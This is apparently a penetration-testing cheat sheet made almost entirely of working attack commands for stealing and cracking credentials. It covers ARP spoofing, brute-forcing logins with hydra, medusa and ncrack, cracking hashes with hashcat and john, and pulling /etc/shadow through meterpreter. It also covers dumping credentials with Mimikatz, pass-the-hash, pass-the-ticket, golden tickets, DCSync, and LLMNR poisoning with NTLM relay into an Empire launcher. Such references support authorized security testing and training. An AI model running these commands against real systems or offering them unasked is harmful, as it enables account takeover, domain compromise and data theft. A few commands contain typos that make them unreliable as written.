Passwords


# ARP spoofing

echo 1 >> /proc/sys/net/ipv4/ip_forward
arpspoof -i <interface> -t <target IP> <gateway>
arpspoof -i eth0 -t 10.0.0.10 10.0.0.1
------------------------------------------------------------------------------------------------------------------------------------------------------

# Create a word list

- Scrape words from a web page
cewl http://target IP/joomla/ > passwords.txt

- Start with a base word
crunch <min characters> <max character> [options]
Example: apple is the base word. The password is 7 characters long, insert symbols then numbers
crunch 7 7 -t apple^% -o passwords.txt
------------------------------------------------------------------------------------------------------------------------------------------------------

# Cracking

john -w=/usr/share/wordlists/rockyou.txt <Responder hash>
john --format=NT -w=/usr/share/wordlists/rockyou.txt <Windows hash>

hashcat -m 5600 <Responder hash> /usr/share/wordlists/rockyou.txt --force                          NetNTLMv2

hashcat -m 1600 -a 3 --force --show --username <hash> /usr/share/wordlists/rockyou.txt --force     Apache
hashcat -m 400 -a 3 --force --show --username <hash> /usr/share/wordlists/rockyou.txt --force      Joomla >= 2.5.18 (MD5), WordPress (MD5)
hashcat -m 0 -a 0 <hash> /usr/share/wordlists/rockyou.txt                                          MD5 (raw hash)
hashcat -m 100 -a 3 --force --show --username <hash> /usr/share/wordlists/rockyou.txt --force      SHA1
hashcat -m 1500 -a 3 --force --show --username <hash> /usr/share/wordlists/rockyou.txt --force     Unix (DES)
hashcat -m 500 -a 3 --force --show --username <hash> /usr/share/wordlists/rockyou.txt --force      Unix (MD5)
hashcat -m 1800 -a 3 --force --show --username <hash> /usr/share/wordlists/rockyou.txt --force     Unix (SHA512)
hashcat -m 1000 -a 3 --force --show --username <hash> /usr/share/wordlists/rockyou.txt --force     Windows (NTLM)

hydra -L <users.txt> -P <passwords.txt> -M <targets.txt> <protocol>
hydra -l <user> -P <passwords.txt> <target IP> <protocol>
hydra -l <user> -P <passwords.txt> <target IP> http-form-post "/teamquest/cgi-bin/login:username=^USER^&pass=^PASS^:S=302 Found" -s 2780

medusa -h <target IP> -u <username> -P <password list> -M <module>
medusa -h <target IP> -u <user> -P <passwords.txt> -M ftp      FTP user with password list

ncrack -vv --user <user> -P <passwords.txt> rdp://targetIP     RDP user with password list

hashcat <MD5 hash> /usr/share/wordlists/rockyou.txt
------------------------------------------------------------------------------------------------------------------------------------------------------

# Crack Linux password hashes

meterpreter > download /etc/passwd
meterpreter > download /etc/shadow

unshadow passwd shadow > hash
john --wordlist /usr/share/wordlists/rockyou.txt hash
------------------------------------------------------------------------------------------------------------------------------------------------------

# Crack a zip file

zip2john test.zip > hashes                                 Convert the zip file into a hash
john --show hashes                                         Show the cracked hash
------------------------------------------------------------------------------------------------------------------------------------------------------

# Dump hashes with Mimikatz

meterpreter > upload /usr/share/mimikatz/x64/mimikatz.exe c:\\
meterpreter > upload /usr/share/mimikatz/x64/mimikatz.sys c:\\
meterpreter > upload /usr/share/mimikatz/x64/sekurlsa.dll c:\\

meterpreter > shell

C:\> mimikatz.exe
privilege::debug
sekurlsa::logonpasswords                                   Look for the NTLM
------------------------------------------------------------------------------------------------------------------------------------------------------

# Identify hash type

hashid <hash>
------------------------------------------------------------------------------------------------------------------------------------------------------

# Pass the Hash

sekurlsa::pth /user:lee /domain:acme.local /ntlm:<hash>
C:\> dir \\dc1.acme.local\c$\Users\Administrator

# Pass the Ticket

C:\> mimikatz.exe
kerberos::list /export                                     Read the tickets that are located in the LSASS, each ticket will be saves to a separate file
                                                           Rename one of the tickets to ticket.test
kerberos::ptt ticket.test                                  Pass the ticket
misc::cmd                                                  Perform an action as the user that we passed the ticket for

C:\> Rubeus.exe asktgt /domain:acme.local /user:Administrator /rc4: <hash> /ptt
C:\> dir \\192.168.1.10\c$

C:\> Rubeus.exe ptt /ticket:ticket.kirbi
C:\> PsExec.exe \\192.168.1.10 cmd.exe
C:\> ipconfig

priviledge::debug
kerberos::golden /user:lee /domain:acme.local /sid:S-1-5-21-1111111111-2222222222-3333333333 /krbtgt:<hash> /id:500 /ptt
C:\> PsExec64.exe \\192.168.1.10 cmd.exe
C:\> ipconfig

# Generate a TGT

C:\> Rubeus.exe asktgt /outfile:kirbi /dc:192.168.1.10 /domain:acme.local /user:lee /ptt /certificate:<cert>
C:\> klist

- DCSync
lsadump::dcsync /domain:acme.local /user:krbtgt            Look for Hash NTLM
lsadump::dcsync /domain:acme.local /user:administrator     Look for Hash NTLM

- Pass the hash
C:\> psexec.py -hashes :<hash> acme.local/administrator@192.168.1.10

------------------------------------------------------------------------------------------------------------------------------------------------------

# SMB singing not enabled

Computer A has admin rights to Computer B.
Computer A as a client does not require SMB signing and supports NetNTLMv1 or NetNTLMv2 authentication.
Computer A has the printer spooler service running.
Computer B as a server does not require SMB signing.
The attacker has access to unprivileged domain creds.

- BloodHound searches
MATCH p=(c1:Computer)-[r1:MemberOf*1..]->(g:Group)-[r2:AdminTo]->(n:Computer) RETURN p
MATCH(c1:Computer)-[r1:MemberOf*1..]->(g:Group)-[r2:AdminTo]->(c2:Computer) RETURN c1.name,c2.name

impacket-ntlmrelayx -smb2support -t smb://<computer B> -c 'whoami /all' -debug
dementor.py -u <user> -p <password> -d <domain> <attacker IP> <computer A>

https://gist.github.com/3xocyte/cfaf8a34f76569a8251bde65fe69dccc
------------------------------------------------------------------------------------------------------------------------------------------------------

# Sniffing

Poison LLMNR/NBT-NS requests and capture NTLM/NTLNv2 hashes (try to identify a host when DNS fails).
vi /etc/responder/Responder.conf                           Set SMB and HTTP to Off
responder -I eth0 -A                                       Analyze mode only
responder -I eth0 -rdP

- Crack the hash
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

- Relay NTLMv2 hashes if SMB signing is not required
impacket-ntlmrelayx -tf targets.txt

- Option
(Empire : listeners) > launcher powershell http
impacket-ntlmrelayx -tf targets.txt -c <insert your Empire PowerShell launcher here>

- IPv6
mitm6 -d acme.org --ignor-nofqdn
------------------------------------------------------------------------------------------------------------------------------------------------------

# Windows Credential Editor (WCE)

How do I change my current NTLM credentials?
wce.exe -s <username>:<domain>:<lmhash>:<nthash>

How do I create a new logon session and launch a program with new NTLM credentials?
wce.exe -s <username>:<domain>:<lmhash>:<nthash> -c <program>

How can I generate NTLM hashes with WCE? (for testing purposes)
wce.exe -g <cleartext password>

How can I write hashes obtained by WCE to a file?
wce.exe -o hashes.txt
